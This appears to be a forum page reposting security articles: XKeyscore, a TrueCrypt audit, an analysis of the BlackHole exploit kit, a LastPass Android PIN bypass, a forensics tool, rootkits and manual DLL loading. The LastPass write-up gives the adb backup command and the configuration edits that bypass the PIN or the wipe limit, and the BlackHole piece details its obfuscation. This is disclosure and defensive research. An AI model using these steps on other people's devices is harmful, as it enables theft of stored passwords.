http://www1.pcmag.com/media/images/394651-xkeyscore-450.jpg?thumb=y Sursa: http://resources.infosecinstitute.com/xkeyscore-nsas-surveillance-program/ Ok, presupunem ca NSA sau mai stiu eu cine poate intercepta tot traficul. Imi place in mod special o idee din articol: The slides explain how XKeyscore can track encrypted virtual private networks (VPN) sessions and their participants, can capture metadata on who’s using PGP (pretty good privacy) in email or who is encrypting their Word documents, which later can be decrypted. Cu alte cuvinte, daca folosesti VPN, PGP in mail sau cryptezi documente... esti suspect? Adica sunt sanse mult mai mici sa te bage in seama daca, aparent, te comporti ca un user "normal", fara sa cryptezi documente si mail-uri?
-
Security Analysis of TrueCrypt 7.0a with an Attack on the Keyfile Algorithm Ubuntu Privacy Remix Team <info@privacy-cd.org> August 14, 2011 Contents Preface.............................................................................................................................................1 1. Data of the Program.....................................................................................................................2 2. Remarks on Binary Packages of TrueCrypt 7.0a..........................................................................3 3. Compiling TrueCrypt 7.0a from Sources.......................................................................................3 Compiling TrueCrypt 7.0a on Linux..............................................................................................3 Compiling TrueCrypt 7.0a on Windows........................................................................................4 4. Methodology of Analysis...............................................................................................................5 5. The program tcanalyzer................................................................................................................6 6. Findings of Analysis......................................................................................................................7 The TrueCrypt License.................................................................................................................7 Website and Documentation of TrueCrypt...................................................................................7 Cryptographic Algorithms of TrueCrypt........................................................................................8 Cryptographic Modes used by TrueCrypt.....................................................................................9 TrueCrypt Volume and Hidden Volumes.....................................................................................11 The Random Number Generator of TrueCrypt...........................................................................11 The Format of TrueCrypt Volumes.............................................................................................12 7. An Attack on TrueCrypt Keyfiles.................................................................................................14 The TrueCrypt Keyfile Algorithm................................................................................................14 The Manipulation of TrueCrypt Keyfiles.....................................................................................14 Response to the Attack by the TrueCrypt Developers................................................................16 8. Conclusion..................................................................................................................................17 Preface We previously have analyzed versions 4.2a, 6.1a and 6.3a of the TrueCrypt program in source code without publishing our results. Now however, for our new analysis of version 7.0a we decided to publish it. We hope that it will help people to form their own sound opinion on the security of TrueCrypt. Moreover, we solicit help in correcting any mistakes that we've made. To this end, we would like to encourage everyone reading this to send criticism or suggestions for further analysis to us. While preparing the analysis for publication we reassessed our previous results. In doing so we discovered major weaknesses in the TrueCrypt keyfile algorithm. This could even be turned into a successful attack on TrueCrypt keyfiles. We present that attack in section 7. We want to stress that the security of TrueCrypt containers which do not use keyfiles is in no way affected by this weaknesses and the attack. TrueCrypt is a multi-platform program. Up to now there are versions for Windows, Linux and Mac OS X. Our analysis mainly focuses on the Linux version. The Windows version has been analyzed to a lesser extent, the Mac OS X version not at all. In large parts the code basis is the same for all operating systems on which TrueCrypt runs. On the other hand there is some special code for each of these operating systems. This is even reflected in slightly diverging behavior of the program on different operating systems here and there. In the source code of TrueCrypt 7.0a there are, moreover, folders for the operating systems Free- BSD and Solaris. Apparently the source code in these folders hasn't reached a point where a program could be built and distributed from it. Therefore, we completely neglected them. The report at hand explains the results of our analysis. It is organized as follows: Section 1 lists some data of the analyzed program. Section 2 contains remarks on binary TrueCrypt packages. Section 3 deals with compiling TrueCrypt from the sources. Section 4 explains the methodology of our analysis. In section 5 we describe our program tcanalyzer which has been written for this analysis. Section 6 contains our findings in detail except for the attack on keyfiles to which section 7 is devoted. Finally section 8 presents our conclusions. The rational for the conclusions in section 8 is mainly presented in section 6. In sections 6 and 7 some elaborated technical or mathematical facts have been documented in the footnotes. Readers who don't have the special skills to understand them may safely ignore them. Download: https://www.privacy-cd.org/downloads/truecrypt_7.0a-analysis-en.pdf
-
Filling a BlackHole Exploit packs. In the black hole. An exploit pack’s start page. Exploit for CVE-2012-5076. Exploit for CVE-2012-0507. Exploit for CVE-2013-0422. Three-in-one. [*]Protection from Java exploits. Stage one: block redirects to the landing page. Stage two: detection by the file antivirus module. Stage three: signature-based detection of exploits. Stage four: proactive detection of exploits. Stage five: detection of the downloaded malware (payload). [*]Conclusion. Today, exploiting vulnerabilities in legitimate programs is one of the most popular methods of infecting computers. According to our data, user machines are most often attacked using exploits for Oracle Java vulnerabilities. Today’s security solutions, however, are capable of effectively withstanding drive-by attacks conducted with the help of exploit packs. In this article, we discuss how a computer can be infected using the BlackHole exploit kit and the relevant protection mechanisms that can be employed. Exploit packs. As a rule, instead of using a single exploit, attackers employ ready-made sets known as exploit packs. This helps them to significantly increase the effectiveness of ‘penetration’, since each attack can utilize one or more exploits for software vulnerabilities present on the computer being attacked. Whereas in the past exploits and malicious programs downloaded with their help to victims’ computers were created by the same people, today this segment of the black market operates according to the SaaS (Software as a Service) model. As a result of the division of labor, each group of cybercriminals specializes in its own area: some create and sell exploit packs, others lure users to exploit start pages (drive traffic), still others write the malware that is distributed via drive-by attacks. Today, all a cybercriminal wishing to infect user machines with, say, a variant of the ZeuS Trojan needs to do is buy a ready-made exploit pack, set it up and get as many potential victims as possible to visit the start page (also called a landing page). Attackers use several methods to redirect users to an exploit pack’s landing page. The most dangerous one for users is hacking pages of legitimate websites and injecting scripts or iframe elements into their code. In such cases, it is enough for a user to visit a familiar site for a drive-by attack to be launched and for an exploit pack to begin working surreptitiously. Cybercriminals can also use legitimate advertising systems, linking banners and teasers to malicious pages. Another method that is popular among cybercriminals is distributing links to the landing page in spam. Infecting user machines using exploit packs: an overview diagram There are numerous exploit packs available on the market: Nuclear Pack, Styx Pack, BlackHole, Sakura and others. In spite of the different names, all these ‘solutions’ work in the same way: each exploit pack includes a variety of exploits plus an administrator panel. Moreover, the operation of all exploit packs is based on what is essentially the same algorithm. One of the best-known exploit packs on the market is called BlackHole. It includes exploits for vulnerabilities in Adobe Reader, Adobe Flash Player and Oracle Java. For maximum effect, exploits included in the pack are constantly modified. In early 2013, we studied three exploits for Oracle Java from the BlackHole pack, so we selected BlackHole to illustrate the operating principles of exploit packs. In the black hole. It should be noted that all data on exploits, the contents of start pages and other specific information discussed in this article (particularly the names of methods and classes and the values of constants) was valid at the time the research was carried out. Cybercriminals are still actively developing BlackHole: they often modify the code of one exploit or another to hinder detection by anti-malware solutions. For example, they may change the decryption algorithm used by one of the exploits. As a result, some of the code may differ from that shown in the examples below; however, the underlying principles of operation will remain the same. [TABLE] [TR] [TD] We print all changeable data in small type.[/TD] [/TR] [/TABLE] An exploit pack’s start page. An exploit pack’s start page is used to determine input parameters and make decisions on the exploit pack’s further actions. Input parameters include the version of the operating system on the user machine, browser and plugin versions, system language etc. As a rule, the exploits to be employed in attacking a system are selected based on the input parameters. If the software required by the exploit pack is not present on the target computer, an attack does not take place. Another reason an attack may not take place is to prevent the exploit pack’s contents from falling into the hands of experts at anti-malware companies or other researchers. For example, cybercriminals may ‘blacklist’ IP addresses used by research companies (crawlers, robots, proxy servers), block exploits from launching on virtual machines, etc. The screenshot below shows a sample of code from the landing page of the BlackHole exploit kit. Screenshot of code from the BlackHole exploit kit’s start page Even a brief look at the screenshot is sufficient to see that the JavaScript code is obfuscated and most information is encrypted. Visiting the start page will result in execution of the code that was originally encrypted. [TABLE] [TR] [TD] Algorithm for decrypting the JavaScript code that was in use in January 2013: populate variables “z1 – zn” with encrypted data, then concatenate these variables into one string and decrypt the data as follows: every two characters (the character “-” is ignored) are considered to make up a 27-ary number, which is converted to decimal; add “57” to the value obtained and divide the result by 5; convert the resulting number back to a character using the function “fromCharCode”. The code which performs these operations is marked with blue ovals on the screenshot above. The second array consists of decimal numbers from 0 to 255, which are converted to characters using the ASCII table. Both code fragments obtained by conversion are executed using the “eval” command (shown on the screenshot with red arrows).[/TD] [/TR] [/TABLE] The entire algorithm above could have been implemented with a few lines of code, but the cybercriminals used special techniques (marked with yellow ovals in the screenshot) to make detection more difficult: deliberately causing an exception with the “document.body*=document” command; checking the style of the first <div> element using the command “document.getElementsByTagName("d"+"iv")[0].style.left===""”; note that an empty <div> element is inserted for this purpose into the document (in the second line); calling “if(123)”, which makes no sense, since this expression is always true; breaking up function names and subsequently concatenating the parts. In addition to the tricks described above, cybercriminals use numerous minor code changes that can hamper signature-based detection. Although our antivirus engine, for example, includes a script emulator and simple changes in constants and operations will not affect the effectiveness of detection, the tricks described above can make things more difficult for an emulator, too. After decryption, code appears in RAM — we will refer to it as the “decrypted script”. It consists of two parts. The first part is a module based on the free PluginDetect library, which can be used to determine the versions and capabilities of most modern browsers and their plugins. Cybercriminals use a variety of libraries, but this module is a key element of any exploit pack. BlackHole uses PluginDetect to select the appropriate exploits for download depending on the software installed on the user machine. By ‘appropriate’ we mean those exploits which have the highest chances of successfully running and launching malware on a specific PC. The second part of the “decrypted script” is code responsible for processing the results produced by PluginDetect functions and then downloading the exploits selected and launching them. In March 2013, BlackHole used exploits for the following vulnerabilities: Java versions from 1.7 to 1.7.?.8 – CVE-2012-5076; Java versions below 1.6 or from 1.6 to 1.6.?.32 – CVE-2012-0507; Java versions from 1.7.?.8 to 1.7.?.10 – CVE-2013-0422; Adobe Reader versions below 8 – CVE-2008-2992; Adobe Reader version 8 or from 9 to 9.3 – CVE-2010-0188; Adobe Flash versions from 10 to 10.2.158 – CVE-2011-0559; Adobe Flash versions from 10.3.181.0 to 10.3.181.23 and below 10.3.181 – CVE-2011-2110. Below we discuss exploits for Java vulnerabilities. Exploit for CVE-2012-5076. Technical details Exploit for CVE-2012-0507. Technical details Exploit for CVE-2013-0422. Technical details Three-in-one. As discussed above, three Java exploits are based essentially on the same mechanism: they obtain privileges and load the payload, which downloads and launches the target file. The three exploits also generate the same Java class file. This clearly indicates that the same person or people were behind the development of these three exploits. The only difference is the technique used to obtain unrestricted privileges for a class file. The class file can download and launch files, decrypting parameters passed via the decrypted script. To make detection more difficult, the malicious file downloaded is usually encrypted and, consequently, does not start with a PE header. The file downloaded is usually decrypted in memory using the XOR algorithm. Passing parameters via the decrypted script is a convenient way of quickly changing the links pointing to the payload: all this takes is to modify data on the exploit pack’s landing page without having to recompile the malicious Java applet. The three vulnerabilities discussed above are so-called logical flaws. It is impossible to control exploits for such vulnerabilities using such automatic tools as those monitoring memory integrity or the generation of exceptions. This means that such exploits cannot be detected using Microsoft’s DEP or ALSR technologies or other similar automatic tools. However, there are technologies that can cope with this – an example is Kaspersky Lab’s Automatic Exploit Prevention (AEP). Protection from Java exploits. In spite of all the efforts by cybercriminals, today’s security solutions can effectively block drive-by attacks conducted using exploit packs. As a rule, protection against exploits includes an integrated set of technologies that block such attacks at different stages. Above, we provided a description of the BlackHole exploit kit’s operating principles. Now we will demonstrate, using Kaspersky Lab solutions as an example, how protection is provided at each stage of an attack using Java exploits from BlackHole. Since the way other exploit packs operate is similar to that implemented in BlackHole, the protection structure discussed here can be applied to them, as well. Staged protection against a drive-by attack Below we discuss which protection components interact with malicious code and when. Stage one: block redirects to the landing page. An attack starts as soon as the user reaches the exploit pack’s landing page. However, the security solution’s web antivirus component can block an attack even before it starts, i.e., before a script on the landing page is launched. This protection component verifies the address of the web page before it is opened. Essentially, this is a simple check of the page’s URL against a database of malicious links, but it can block the user from visiting the exploit pack’s landing page, provided that its address is already known to belong to a malicious resource. This makes it essential for antivirus vendors to add malicious links to their databases as early as possible. Malicious URL databases can be located on user machines or in the cloud (i.e., on a remote server). In the latter case, cloud technologies help to minimize the time lag before a security product begins to block new malicious links. The ‘response time’ is reduced in this case because the security solution installed on the user machine receives information about a new threat as soon as the relevant record is added to the malicious links database, without having to wait for an antivirus database update. Cybercriminals in turn try to change domains used to host exploit pack landing pages very often to prevent security software from blocking these pages. This ultimately reduces the profitability of their business. Stage two: detection by the file antivirus module. If the user has after all reached an exploit pack’s landing page, this is where components of the file antivirus module – the static detector and the heuristic analyzer – come in. They scan the exploit pack’s landing page for malicious code. Below we analyze the operating principles, advantages and shortcomings of each component. The static detector uses static signatures to detect malicious code. Such signatures are triggered only by specific code fragments, essentially by specific byte sequences. This is the threat detection method that was used in the early antivirus solutions and its advantages are well known. They include high performance and ease of storing signatures. All a detector needs to do to come up with a verdict is compare the checksum or byte sequence of the code being analyzed to the relevant records in the antivirus database. Signatures are tens of bytes in size and easily packed, making them easy to store. The most significant shortcoming of a static detector is the ease with which a signature can be ‘evaded’. All the cybercriminals have to do to make the detector stop detecting an object is change just one byte. This shortcoming leads to another one: a large number of signatures is needed to cover a large number of files, which means that the databases rapidly grow in size. The heuristic analyzer also uses databases, but works according to a completely different operating principle. It is based on analyzing objects: collecting and intelligently parsing object data, identifying patterns, computing statistics etc. If the data produced as a result of this analysis matches a heuristic signature, the object is detected as malicious. The main advantage of a heuristic signature is that it enables the solution to detect a large number of similar objects provided that the differences between them are not too great. The drawback is that compared to processing static signatures, the heuristic analyzer can be slower and affect system performance. For example, if a heuristic signature is not designed efficiently, i.e., if it requires a large number of operations to perform its checks, this may affect system performance on the machine on which the antivirus solution is running. To prevent an object from being detected using a static signature, cybercriminals need to make minimal changes to the object’s code (script, executable program or file). This process can to some extent be automated. To evade heuristic detection, a malware writer needs to conduct research to find out what mechanism is used to detect the object. When the algorithm has been fully or partially analyzed, changes preventing the heuristic signature from being triggered must be made to the malicious object’s code. Clearly, ‘evading’ a heuristic signature inevitably takes cybercriminals longer than preventing detection using static signatures. This means that heuristic signatures have a longer ‘life span’. On the other hand, after malware writers have modified an object to evade heuristic detection, it also takes an antivirus vendor some time to create a different signature. As discussed above, an anti-malware solution uses different sets of signatures to scan the landing page. In their turn, malware writers modify objects on the exploit pack’s start page in order to evade signature-based detection of both types. While it is sufficient to simply break strings up into characters to evade static signatures, evading heuristics requires making use of the finer features offered by JavaScript – unusual functions, comparisons, logical expressions, etc. An example of this type of obfuscation was provided in the first part of the article. It is at this stage that malware is often detected, particularly due to excessive code obfuscation that can be regarded as a characteristic feature of malicious objects. In addition to databases stored on the computer’s hard drive, there are signatures located in the cloud. Such signatures are usually very simple, but the extremely short new-threat response time (up to five minutes from creating a signature to making it available in the cloud) means that user machines are well protected. Stage three: signature-based detection of exploits. If the security solution fails to recognize the start page of the exploit pack, the latter comes into operation. It checks which browser plugins are installed (Adobe Flash Player, Adobe Reader, Oracle Java, etc.) and makes a decision as to which exploits will be downloaded and launched. The security solution will scan each exploit being downloaded in the same way as it did the exploit pack’s landing page – using the file antivirus module and cloud-based signatures. The attackers in their turn try to evade detection using certain techniques, which are similar to those described above. Stage four: proactive detection of exploits. If none of the components responsible for reactive (signature-based) protection has detected anything suspicious while scanning the exploit pack’s contents and an exploit has launched, this is where proactive protection modules come in. They monitor the behavior of applications in the system in real time and identify any malicious activity. Each application is categorized, based on information provided by heuristic analysis, data from the cloud and other criteria, as “Trusted”, “Low Restricted”, “High Restricted” or “Untrusted”. Application Control restricts each application’s activity based on its category. Applications in the Trusted class are allowed all types of activity, those in the Low Restricted group are denied access to such resources as password storage, programs in the High Restricted category are not allowed to make changes to system folders, etc. All the applications being launched and all those running are analyzed by a module called Application Control in Kaspersky Lab products. This component monitors program execution in the system using low-level hooks. In addition to the above, so-called behavior stream signatures (BSS) describing malicious activity are used to detect the dangerous behavior of applications. Such signatures are developed by virus analysts and are subsequently compared to the behavior of active applications. This enables proactive protection to detect new malware versions that were not included in the Untrusted or High Restricted categories. It should be noted that this type of detection is the most effective, since it is based on analyzing data on applications’ actual current activity rather than static or heuristic analysis. It renders such techniques as code obfuscation and encryption completely ineffective, because they in no way affect the behavior of a malicious program. For more stringent control of applications to prevent their vulnerabilities from being exploited, we use a technology called Automatic Exploit Prevention (AEP). The AEP component monitors each process as it is launched in the system. Specifically, it checks the call stack for anomalies, checks the code which launched each process, etc. In addition, it performs selective checks of dynamic libraries loaded into processes. All this prevents malicious processes from being launched as a result of exploiting vulnerabilities. This is in fact the last line of defense, providing protection against exploits in the event that other protection components have failed. If an application, such as Oracle Java or Adobe Reader, behaves suspiciously as a result of exploitation, the vulnerable legitimate application will be blocked by the anti-malware solution, preventing the exploit from doing harm. Since protection at this stage is based on the program’s behavior, cybercriminals have to use sophisticated and labor-intensive techniques to evade proactive protection. Stage five: detection of the downloaded malware (payload). If an exploit does go undetected, it attempts to download the payload and run it on the user machine. As we wrote above, the malicious file is usually encrypted to make detection more difficult, which means that it does not begin with a PE header. The file downloaded is usually decrypted in memory using the XOR algorithm. Then the file is either launched from memory (usually, this is a dynamic library) or dropped on the hard drive and then launched from the hard drive. The trick of downloading an encrypted PE file enables the malware to fool antivirus solutions, because such downloads look like ordinary data streams. However, it is essential that the exploit launches a decrypted executable file on the user machine. And an anti-malware solution will subject that file to all the various protection technologies discussed above. Conclusion. Exploit packs are an integrated system for attacking victim machines. Cybercriminals devote a lot of time and effort to maintain the effectiveness of exploit packs and minimize detections. In their turn, anti-malware companies are continually improving their security solutions. Anti-malware vendors now have a range of technologies that can block drive-by attacks at all stages, including those involving exploitation of vulnerabilities. Sursa: https://www.securelist.com/en/analysis/204792303/Filling_a_BlackHole
-
[h=1]Reclamele ne pot bombarda in somn. Se intampla deja in Germania. VIDEO[/h] Pasagerii care merg cu trenul si-si sprijina capul de fereastra sunt treziti de o voce care le prezinta un nou produs sau serviciu. Si mai mare le e mirarea atunci cand isi dau seama ca doar ei aud mesajul. Tehnologia care face totul posibil se numeste "conductie osoasa"si, in urmatorii ani, ar putea fi prezenta in majoritatea trenurilor si autobuzelor, potrivit stirileprotv.ro. Cu gandul la navetistii care locuiesc in suburbii, o agentie de publicitate din Dusseldorf a venit cu o propunere inedita. "Fereastra vorbitoare", care parca ar comunica telepatic, numai cu cei care-si ating capul de geam. Din senin, pasagerii carora capul le aluneca in somn si se sprijina de fereastra aud un mesaj publicitar. Cand isi dau seama ca geamul le "vorbeste", majoritatea verifica reactia celor din jur. Sunt cu adevarat surprinsi cand isi dau seama ca sunt singurii din vagon care aud mesajul. Totul e posibil datorita unui mic dispozitiv plasat pe fereastra, programat sa vibreze cand simte o presiune. Sebastian Hardieck, departamentul de creatie: "Un os din corp vibreaza, iar urechea interpreteaza apoi acele vibratii cu frecventa inalta si le transforma in sunet. Iti apropii capul de fereastra si nu auzi niciun sunet, dar urechea parca tot le aude... Este foarte interesant." Tehnologia se numeste "conductie osoasa" si permite transmiterea sunetelor prin vibratia oaselor craniene. Desi unii sustin ca asa arata publicitatea viitorului, nu toata lumea e incantanta de idee. Matthias Oomen, asociatie pentru transportul public: "Nu ne amuza deloc ideea unei ferestre care vorbeste. Transportul public are multe avantaje, iar unul dintre ele e ca poti calatori linistit. Problema aceasta e la fel de importanta precum pretul biletelor sau siguranta pasagerilor." Ideea face valva deocamdata doar pe internet, dar doua treimi din comentariile adunate sunt negative. Unii chiar cer boicotarea companiilor care vor folosi o astfel de tehnologie pentru a-si promova produsele. Sursa: Reclamele ne pot bombarda in somn. Se intampla deja in Germania. VIDEO - www.yoda.ro
-
Si daca toate lucrurile astea care se spun despre NSA sunt inventate pentru ca noi sa punem mai mult accentul pe securitate?
-
[0-Day] vBulletin 4.2.x - Multiple Cross-Site-Scripting Vulnerabilities
Nytro replied to sensi's topic in Exploituri
Unde a mai fost facut public inainte? -
A sneak peek into Android “Secure” Containers Posted by ChrisJohnRiley on September 5, 2013 It’s been a bit quiet here on the blog, so I thought I’d take a few minutes to write up an issue I raised with the fine folks over at LastPass . Alongside the HTTP Response Code stuff, I’ve been playing around more and more with Android applications. One of the things I presented on in Vegas at the BSidesLV Underground track was breaking into Android Secure Containers. The name of the talk was cryptic for sure, mostly because said “secure” containers were anything but secure, and because I hadn’t had time to report the issues to the effected vendors. The issues I discussed weren’t tied to a single application, and effect numerous apps within the Play Store… So, here we are a month later, and LastPass has rolled out a “fix” for the issue I reported to them. This means I can give you the down and dirty details now that you’ve all updated your Android devices to the latest LastPass version (currently 2.5.1). FYI: the CVE numbers for these issues although not referenced in the LastPass changelogs as yet are CVE-2013-5113 and CVE-2013-5114. This research needs a little back story to explain it, so bear with me for a minute while I set the stage. Back Story / Testing Scenario I started down this research track when I was looking at how Android applications provide additional security through PIN and/or password protection of specific applications. This additional layer of security offered by applications like LastPass is there to stop people who have physical access to your Android device from getting into the more secure areas of your data (e.g. Passwords). With this in mind I expected the implementation of these protections to be designed to stand up to an attacker with physical access to the device (aka. somebody who’s stolen/borrowed/found your Android device). Some Facts Without root access to the android device, it’s not directly possible to view or alter the data of specific applications. Even if USB Debugging is enabled (by the owner, or later by an attacker with device access) it’s only possible to view specific data on the Android device, not all the juicy stuff. Everything I’m about to discuss is possible based on a non-rooted device, however USB debugging needs to be enabled to allow us to interact with the device using adb. Remember, the scenario we’re talking about here is physical device access, so this shouldn’t be a big hurdle. Note: It goes without saying that everything that can be achieved here with ADB /USB Debugging can also be achieved through exploitation of the device… although, there are much more fun things to do if you’re popping shell on a device The LastPass Case LastPass allows a user to save their password within the Android application so that you don’t need to type it every time you open the app. This isn’t abnormal for applications, and like any good security minded application they give you options to secure the access using something other than your long long password (aka… the PIN). Given my experience, users of such applications have too much faith in the security of their devices and have no desire to type in their 32 character random LastPass password whenever they open the application (have you tried that on a handheld device? Yhea, not fun…). Much better to store the password in the secure container settings and assign a PIN to protect the app (because that’s secure!). So with the back story and the explanation out the way, here’s the meat of the issue The Meat When I first started testing LastPass on the Android (version 2.0.4 at the time) I noticed something interesting about the AndroidManifest. In particular the android:allBackup was set to True, meaning that even though I couldn’t read or edit the configuration/settings of LastPass directly on the device (remember, non-rooted device) or via ADB (remember, USB debugging enabled, but even then no direct access), I could perform backup and restore operations via ADB. This led me down the trail of learning more about the “adb backup” command (introduced in Android ICS). What makes adb backup and restore so useful in this context, is the ability to not only backup a device entirely over USB, but also to specifically backup individual application data (with or without the APK file). This makes the backup and restore much more flexible for what we’re looking at doing. After all, backing up an entire 16GB device every time gets tiring (I’m looking at you iOS). By performing an adb backup (command: adb backup com.lastpass.lpandroid -apk) and accepting the prompt on the device, you end up with a backup.ab file containing the LastPass application (APK) and the data/configuration/settings from the application. There have been numerous discussions on the format used by Android Backup files, but I wasn’t happy with any of the solutions offered to decrypt the AB files into something usable. So I decided to automate the lengthy process in Python (see BSidesLV: Android Backup [un]packer release | C????²² (in)s??u?it? / ChrisJohnRiley) and add in some features to ease things a little. The final result is a directory output of the LastPass application (with or without the APK – your choice – screenshot is without APK). Taking a look at the files the sp/LPandroid.xml quickly stood out as worth further analysis. As expected the configuration file contained the username and password in encoded format (if saved within the LastPass app). Alongside this the XML also contains an encoded version of the PIN and various other application settings. Putting aside the possibility to decode the password and PIN, a few settings caught my eye for easy wins: reprompt_tries This is a simple integar that increases as incorrect PINs are entered passwordrepromptonactive pincodeforreprompt (holds encoded PIN) requirepin These control the password reprompt on startup and the PIN protection (yeah, you can see where this is going already) The Story So Far We have access to the LastPass configuration of a non-rooted device via adb backup… and we can fiddle with the resulting configuration file. However we’re still playing about with the XML inside a backup and not with the device itself. We need to get the changes back into the device Next Step Using more Python trickery goodness (see BSidesLV: Android Backup [un]packer release | C????²² (in)s??u?it? / ChrisJohnRiley) we can take the directory structure created and rebuild the Android Backup file (with the changes that we’ve made to the files of course). Then we can restore the backup to the device (if you still have access to it) or to your own device/emulator (make sure you have the APK in the backup file or the app already installed if you want to restore to another device). Effects As expected, playing with the reprompt_tries by setting it to a minus number (-9999 for example) allows you to bypass the 5 PIN attempts before wipe feature of LastPass. This essentially gives you 10,000 retries. If you can’t guess a 4 digit PIN in 10,000 retries, then nothing can help you However, the easier and more fun option is the pincodeforreprompt / passwordrepromptonactive and requirepin alteration which results in the LastPass application not requiring a PIN for entry anymore. Backup configuration and unpack Alter XML settings as required Pack configuration and restore <<< Profit >>> After-effects Some of the more eagle eyed amongst you may have already noticed another interesting attack vector here. The ability to backup LastPass from a device (within 30 seconds if you’re handy ;) and return the device to the owner, coupled with the freedom to restore said backup to an attacker controlled device, makes the attack much more interesting. Not only can you do this, bypass the PIN in your own time, and then read and extract the stored passwords as desired. You can also maintain access to the users LastPass account until such time as they change their LastPass password itself. If the original owner alters their any of the passwords their store in the LastPass service, the attacker can simply close and restart the cloned Android container to update the information from LastPass’ servers. Note: Version 2.5.1 mentions an alteration in the way LastPass creates UUIDs. This may effect this cloning attack – as yet unconfirmed Round 2 – It’s not over yet You may have noticed the use of quotes around “fix” at the beginning of this post… After LastPass got back to me to say they’d fixed the issue (actually they responded to say they’d fixed it the day before I reported it as they’d disabled allowBackup and not pushed it to the Play Store yet), I started looking at the proposed fix and possible bypasses based on the same physical access scenario. After a few false starts I have a working bypass for their fix that once again allows the attack (with an additional step). Once they’ve fixed the fix, I’ll let you guys know how that one went down Until then, make sure you upgrade your Lastpass to the latest Play Store version (2.5.1 at this time) and keep an eye out for further fixes! Links: android:allowBackup > R.attr | Android Developers Android ADB > Android Debug Bridge | Android Developers Python scripts for easier Android Backup fiddling > BSidesLV: Android Backup [un]packer release | C????²² (in)s??u?it? / ChrisJohnRiley Lastpass Android (Play Store) > https://play.google.com/store/apps/details?id=com.lastpass.lpandroid Sursa: A sneak peek into Android “Secure” Containers | C????²² (in)s??u?it? / ChrisJohnRiley
-
[h=2]What Is SHA-3 Good For?[/h] Cryptographers are excited because NIST have announced the selection of SHA-3. There are various reasons to like SHA-3, perhaps most importantly because it uses a different design from its predecessors, so attacks that work against them are unlikely to work against it. But if I were paranoid, there’d be something else I’d be thinking about: SHA-3 is particularly fast in hardware. So what’s bad about that? Well, in practice, on most platforms, this is not actually particularly useful: it is quite expensive to get data out of your CPU and into special-purpose hardware – so expensive that hardware offload of hashing is completely unheard of. In fact, even more expensive crypto is hardly worth offloading, which is why specialist crypto hardware manufacturers tend to concentrate on the lucrative HSM market, rather than on accelerators, these days. So, who benefits from high speed hardware? In practice, it mostly seems to be attackers – for example, if I want to crack a large number of hashed passwords, then it is useful to build special hardware to do so. It is notable, at least to the paranoid, that the other recent crypto competition by NIST, AES, was also hardware friendly – but again, in a way useful mostly to attackers. In particular, AES is very fast to key – this is a property that is almost completely useless for defence, but, once more, great if you have some encrypted stuff that you are hoping to crack. The question is, who stands to benefit from this? Well, there is a certain agency who are building a giant data centre who might just like us all to be using crypto that’s easy to attack if you have sufficient resource, and who have a history of working with NIST. Just sayin’. Sursa: Links
-
[h=2]OS X Auditor- Mac Forensics Tool[/h]September 8th, 2013 Mourad Ben Lakhoua OS X Auditor is a python based computer forensics tool. The tool allows analysts to parse and hash artifacts on the running system or a copy of a system to not modify the original evidence. the program will look at: the kernel extensions the system agents and daemons the third party’s agents and daemons the old and deprecated system and third party’s startup items the users’ agents the users’ downloaded files the installed applications It also extracts: the users’ quarantined files the users’ Safari history, downloads, topsites, HTML5 databases and localstore the users’ Firefox cookies, downloads, formhistory, permissions, places and signons the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage the users’ social and email accounts the WiFi access points the audited system has been connected to (and tries to geolocate them) This beside looking for suspicious keywords in the .plist themselves. It can verify the reputation of each file on Team Cymru’s MHR,VirusTotal ,Malware.lu or your own local database. You can also aggregate all logs from the following directories /var/log (-> /private/var/log) , /Library/logs , the user’s ~/Library/logs into a zipball. Finally, the results can be rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep), rendered as a HTML log file or sent to a Syslog server. You can download the tool by following this link. Sursa: OS X Auditor- Mac Forensics Tool | SecTechno
-
Inside Windows Rootkits By Chad Tilbury on September 4, 2013 Despite being written in 2006, Chris Ries’ paper Inside Windows Rootkits is still surprisingly relevant. About the only thing missing is a discussion of new(er) x64 mitigation techniques like Kernel Mode Code Signing and Kernel Patch Protection (aka PatchGuard). Few resources have explained rootkit internals so simply. As an example, Figure 2 from the paper neatly ties together the rootkit hooking universe: Figure 2: Potential places to intercept a call to the FindNextFile function, Inside Windows Rootkits by Chris Ries The original PDF is a little hard to find these days, but here are a couple of links: Chris Ries- Inside Windows Rootkits http://thehackademy.net/madchat/vxdevl/library/Inside%20Windows%20Rootkits.pdf Sursa: Inside Windows Rootkits | Forensic Methods
-
Loading Win32/64 DLLs "manually" without LoadLibrary() By pasztorpisti, 8 Sep 2013 Download LoadDLL.zip (Visual C++ 2010 solution with example program and C/C++ DLLs) - 20.4 KB Introduction Sooner or later many people start thinking about loading a DLL without LoadLibrary(). OK, maybe not so many... It has only a few advantages and can introduce lots of inconvenience problems when coding the DLL (depending on what your DLL does) compared to a situation where you load the DLL with an ordinary LoadLibrary() call, so this technique has limited use. (I will aim the inconvenience problems below.) Still this tip can make good service as a tutorial if you want to understand what's going on behind the curtains... I myself used this stuff to write DLLs in C/C++ instead of coding offset independent assembly (in an anticheat engine), but that is another story. Implementation The most important steps of DLL loading are: Mapping or loading the DLL into memory. Relocating offsets in the DLL using the relocating table of the DLL (if present). Resolving the dependencies of the DLL, loading other DLLs needed by this DLL and resolving the offset of the needed functions. Calling its entrypoint (if present) with the DLL_PROCESS_ATTACH parameter. I wrote the code that performed these steps but then quickly found out something is not OK: This loaded DLL doesn't have a valid HMODULE/HINSTANCE handle and many windows functions expect you to specify one (for example, GetProcAddress(), CreateDialog(), and so on...). Actually the HINSTANCE handle of a module is nothing more than the address of the DOS/PE header of the loaded DLL in memory. I tried to pass this address to the functions but it didn't work because windows checks whether this handle is really a handle and not only the contents of memory! This makes using manually loaded DLLs a bit harder! I had to write my own GetProcAddress() because the windows version didn't work with my DLLs. Later I found out that I want to use dialog resources in the DLL and CreateDialog() also requires a module handle to get the dialog resources from the DLL. For this reason I invented my custom FindResource() function that works with manually loaded DLLs and it can be used to find dialog resources that can be passed to the CreateDialogIndirect() function. You can use other types of resources as well in manually loaded DLLs if you find a function for that resource that cooperates with FindResource(). In this tip you get the code for the manual DLL loader and GetProcAddress(), but I post here the resource related functions in another tip. Limitations The loaded DLL doesn't have a HMODULE so it makes life harder especially when its about resources. The DllMain() doesn't receive DLL_THREAD_ATTACH and DLL_THREAD_DETACH notifications. You could simulate this by creating a small DLL that you load with normal LoadLibrary() and from the DllMain() of this normally loaded DLL you could call the entrypoint of your manually loaded DLLs in case of DLL_THREAD_ATTACH/DLL_THREAD_DETACH. If your DLL imports other DLLs, then the other DLLs are loaded with the WinAPI 